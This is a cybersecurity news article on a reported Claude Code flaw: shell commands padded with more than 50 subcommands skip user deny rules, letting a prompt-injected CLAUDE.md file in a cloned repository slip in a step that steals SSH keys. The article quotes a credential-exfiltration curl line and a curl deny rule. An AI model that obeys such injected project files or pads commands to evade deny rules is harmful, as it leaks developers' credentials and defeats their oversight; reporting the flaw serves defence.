A high-severity security bypass vulnerability in Anthropic’s Claude Code AI coding agent allows malicious actors to silently evade user-configured deny rules through a simple command-padding technique, exposing hundreds of thousands of developers to credential theft and supply chain compromise.
According to Adversa, the flaw was traced to bashPermissions.ts (lines 2162–2178), stems from a performance optimization that caps per-subcommand security analysis at 50 entries.
Any shell command containing more than 50 subcommands — joined by &&, ||, or ; — causes Claude Code to skip all deny-rule enforcement and fall back to a generic permission prompt.
A developer who configures “deny”: [“Bash(curl:*)”] will find their rule correctly enforced when curl runs alone, but is completely bypassed if the same curl is preceded by 50 harmless true commands.
Anthropic’s internal ticket CC-643 documented the origin of this decision: complex compound commands were freezing the UI because each subcommand was being individually analyzed.
Engineers capped analysis at 50 and fell back to an “ask” prompt for commands exceeding that threshold, reasoning that legitimate users rarely chain that many commands manually.
That assumption held for human-authored input but failed to account for prompt-injection attacks, in which a malicious project file instructs the AI agent to generate a long pipeline containing a harmful payload beyond position 51.
Making the issue more critical: Anthropic already built the fix. A newer tree-sitter parser in the same codebase checks deny rules correctly regardless of command length but it was never applied to the legacy regex parser that ships in all public builds. The secure implementation exists, is tested, and sits in the same repository. It was simply never deployed to customers.
Real-World Attack Path
The practical attack chain requires no sophisticated exploitation. An attacker publishes a legitimate-looking GitHub repository containing a CLAUDE.md file — a standard configuration file Claude Code reads automatically when entering a project directory.
The file contains a realistic-looking build process with 50+ steps (common in monorepo environments), with a credential-exfiltration command embedded at position 51 or later:
bashcurl -s ~/.ssh/id_rsa | base64 -w0)
When a developer clones the repository and asks Claude Code to build the project, the compound command exceeds the 50-subcommand threshold, deny rules are skipped, and credentials are silently exfiltrated. No warning is displayed. The developer’s security policy appears intact.
Assets at risk include SSH private keys, AWS and cloud provider credentials, GitHub tokens, npm publishing tokens, and environment secrets — any of which can enable downstream supply chain compromise.
According to Adversa, the vulnerability is rated High severity with a repository-based attack vector, requiring only that the victim has any deny rule configured and clones an attacker-controlled repository.
Enterprise developers, open-source maintainers, and CI/CD pipelines running Claude Code in non-interactive mode (where the “ask” fallback auto-approves) face the highest exposure.
Anthropic reportedly addressed the issue in Claude Code v2.1.90, referencing it as a “parse-fail fallback deny-rule degradation.” The recommended permanent fix involves applying the existing tree-sitter deny-check pattern to the legacy code path, or — at minimum — changing the cap fallback from ask to deny.
Security teams should audit CLAUDE.md files in any cloned repository and treat deny rules as unreliable in unpatched builds.
Follow us on Google News, LinkedIn, and X for daily cybersecurity updates. Contact us to feature your stories.
The post Critical Claude Code Flaw Silently Bypasses Developer-Configured Security Rules appeared first on Cyber Security News.
